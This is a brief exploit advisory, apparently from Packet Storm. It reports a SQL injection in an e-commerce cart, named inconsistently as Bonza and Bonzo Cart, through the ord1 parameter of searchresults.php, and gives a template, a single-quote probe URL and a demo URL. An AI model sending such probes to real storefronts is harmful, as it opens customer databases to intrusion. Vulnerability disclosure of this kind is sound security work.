Bonza Digital Cart suffers from a remote SQL injection vulnerability.
81a7fda868403b8557e1919f23a9d5e5d93678c9e82e368254661d880bc8b994# Exploit Title: Bonzo Cart (E-Commerce System) SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.turnkeycentral.com
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
SQL Injection can be done using the command input
Example
searchresults.php?ord1=<SQL Injection
Code>&ord2=asc&search1=&SearchTerm=&where=ItemName
Exploit:
searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName
Demo:
http://site.com/bonzacart/searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed